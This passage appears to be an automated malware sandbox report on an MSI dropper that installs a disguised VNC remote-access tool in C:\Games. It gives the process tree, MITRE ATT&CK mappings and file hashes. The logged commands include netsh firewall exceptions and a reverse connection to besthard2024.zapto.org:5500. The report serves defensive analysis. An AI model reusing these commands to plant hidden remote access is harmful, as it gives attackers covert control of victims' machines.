    C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEBB15.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEBB15.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" cls"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2368

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:808
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DCC0A7B1C2009FA3A55724565ED974D7 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2044
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DB3CA0AD81961781C9F2F4DD51C1ADC6
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1968
- C:\Windows\Installer\MSIBA72.tmp
  "C:\Windows\Installer\MSIBA72.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1620

C:\Games\PrintDrivers.exe
"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1772

C:\Windows\system32\cmd.exe
cmd /c ""C:\Games\PrintDrivers.cmd" "
1⤵
- Suspicious use of WriteProcessMemory
PID:560
- C:\Windows\system32\mode.com
  Mode 90,20
  2⤵
  PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
  2⤵
  PID:2152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\system32\reg.exe
    Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    3⤵
    PID:988
- C:\Windows\System32\Wbem\WMIC.exe
  wmic process where (name="PrintDriver.exe") get commandline
  2⤵
  PID:2512
- C:\Windows\system32\findstr.exe
  findstr /i "PrintDriver.exe"
  2⤵
  PID:1756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
  2⤵
  PID:2684
- C:\Windows\system32\cmd.exe
  cmd
  2⤵
  - Loads dropped DLL
  PID:2732
- - C:\Windows\system32\mode.com
    Mode 90,20
    3⤵
    PID:2904
- - C:\Windows\system32\netsh.exe
    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2468
- - C:\Windows\system32\netsh.exe
    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where (name="PrintDriver.exe") get commandline
    3⤵
    PID:2920
- - C:\Windows\system32\findstr.exe
    findstr /i "PrintDriver.exe"
    3⤵
    PID:2704
- - C:\Games\PrintDriver.exe
    C:\Games\PrintDriver.exe -autoreconnect ID:5700530 -connect besthard2024.zapto.org:5500 -run
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2708
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:2984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1496
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:2004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2112
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:572
- C:\Games\PrintDrivers.exe
  C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:1836

C:\Windows\system32\cmd.exe
cmd /c ""C:\Games\driverhelp.cmd" "
1⤵
PID:1196
- C:\Windows\system32\mode.com
  Mode 90,20
  2⤵
  PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
  2⤵
  PID:1140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
  2⤵
  PID:1480
- - C:\Windows\system32\reg.exe
    Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    3⤵
    PID:2432
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:2252
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:1008
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:1676
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:1340
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:1028
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:2544
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f76b8d7.rbs

Filesize
422KB

MD5
cf58d33b19946b6e77fa7b8e27691dbe

SHA1
e86a59308de117261303b3d1c7eb39ec0b522f7f

SHA256
41263eb855132508adfde3540e11ece74e7aa7bff61fe4740740575734a676df

SHA512
b4dff6a9ea291bcbed8f1e1947c925ce584209fbf6315aae50451591aa816bdb1f901dd0f4259279bbc2594e28badae50a500e1a50b6ffc2d5d2fa79b3252caa

Download Submit
C:\Games\PrintDriver.exe

Filesize
2.8MB

MD5
27c1c264c6fce4a5f44419f1783db8e0

SHA1
e071486e4dfef3a13f958a252d7000d3ce7bfd89

SHA256
29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db

SHA512
a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

Download Submit
C:\Games\PrintDriver.txt

Filesize
1KB

MD5
6eb13f7936a83f4c44842029914aad6e

SHA1
7b9b27731d4ca6f996ce68c5d68b4d653e31d915

SHA256
8d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49

SHA512
227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e

Download Submit
C:\Games\PrintDrivers.cmd

Filesize
1KB

MD5
eacc690f71a77685f030bef23b506b91

SHA1
03b911ba997d44028bf515ea44fe4813b4b4a785

SHA256
0f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263

SHA512
9870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d

Download Submit
C:\Games\PrintDrivers.exe

Filesize
403KB

MD5
29ed7d64ce8003c0139cccb04d9af7f0

SHA1
8172071a639681934d3dc77189eb88a04c8bcfac

SHA256
e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f

SHA512
4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

Download Submit
C:\Games\UltraVNC.ini

Filesize
1KB

MD5
cb5b8a5789c15957c039ff3ce988c1a2

SHA1
4de9a626f04bc7c619fdb68e5585739855ded2d1

SHA256
a11a72865948a8d6a88df530108c3b8ba3e8b4ac6316ac22443af81fa1c3daf4

SHA512
68dd583237ea70702d76d9a2a607bbb8f2e2a1e4285de347b4e23faa0063b51f20f5a84cbe907ef4c123eba0add1c99cb4f9f1e13ddff97b34bb1e7c18825e32

Download Submit
C:\Games\driverhelp.cmd

Filesize
870B

MD5
fd3b5847ddb8a31413951c0aa870ab95

SHA1
e3e91e3e9fa442cd1937422120de91da87973ddb

SHA256
e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad

SHA512
5d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
538f1863a0374a58d22bdd8316861394

SHA1
83b8efc53691558b404f0b29530ad7390c1997f1

SHA256
20ecc008462677f0a416844c6d73021939f6e0d15eadbf0f083f6808fd0f241b

SHA512
b8c588a707b609b5f64234dda7d9aabcce66b477fee348372c286835892e88bf080e5ef74bd39d2d4bef5e93d83fba75ca8f1572364adcf2ca4bd21606ee90a7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5ba57e4eef04aeedf51b98cb1cf537e4

SHA1
1064e5b918cd9dd823fd391022111a6105022330

SHA256
a5e0091df6e18fd4e202cec725369e21d3c60e056ca27dbd64384497789da857

SHA512
fe1f125391ef03b19e3624701bf18875d967f74c2df59e0374f7542d1e90df7688df5be2c26469a9622136b2d3f3d6f054319110a67095fd79d079282749f22c

Download Submit
C:\Users\Admin\AppData\Local\Temp\AIE9C8F.tmp

Filesize
6.7MB

MD5
e21b2080c98beb0f04307a5a25630e23

SHA1
8fc24ad51e8d61324fe8de1be667862e9238cbbb

SHA256
0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e

SHA512
3706fde6569bccb39e2c58e86c60050c73bcdbe5c7eb05849ced33c75b5a1c3b080746c2e27420c6fffcd3497e1b1b6ab87e1b2d371a80fa3ae27851a64cfbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA660.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\EXEBB15.bat

Filesize
369B

MD5
f8e37804235ab3f7af30adff9f720482

SHA1
fdde9873294850acb1c07ae31ab7786f6a7f6345

SHA256
15d53b21e7f1c986eae3fbe65fe2d488be0b80aa73c5d7cf88a8a9b1d3510ebb

SHA512
2bed3c302e2d1e6a61e76baf70c00914def1d8692b7dec3ec165e351d9e7610acb7827b3d2c1dfb9278305bd178c64eedace6491577fc492f7a22c6922e4c923

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIA88E.tmp

Filesize
997KB

MD5
ec6ebf65fe4f361a73e473f46730e05c

SHA1
01f946dfbf773f977af5ade7c27fffc7fe311149

SHA256
d3614d7bece53e0d408e31da7d9b0ff2f7285a7dd544c778847ed0c5ded5d52f

SHA512
e4d7aafa75d07a3071d2739d18b4c2b0a3798f754b339c349db9a6004d031bf02f3970b030cec4a5f55b4c19f03794b0ce186a303d936c222e7e6e8726fffff7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA692.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Windows\Installer\MSIBA72.tmp

Filesize
418KB

MD5
432827ec55428786a447b3d848d963b7

SHA1
029901586604f3ab1b0bd18868469a96db0ef470

SHA256
5a4e76f840fe7d9872164c6c3ce85f4dd0405e661c04638e0b8a91157398bbf0

SHA512
efe03d3446b07180a12d8cd8d0b6d25dd6da5b445c6d61125b0e81c848a98b78f502a6c7c8c7dfc87b3d5beafdea100ac6580e0d28f2cfb99eda90a19449c226

Download Submit
memory/560-235-0x00000000023C0000-0x00000000023D0000-memory.dmp

Filesize
64KB

Download
memory/1620-170-0x0000000000120000-0x0000000000122000-memory.dmp

Filesize
8KB

Download
memory/1772-173-0x0000000000160000-0x0000000000162000-memory.dmp

Filesize
8KB

Download
memory/1836-250-0x0000000000320000-0x0000000000322000-memory.dmp

Filesize
8KB

Download
memory/2420-0-0x00000000002F0000-0x00000000002F1000-memory.dmp

Filesize
4KB

Download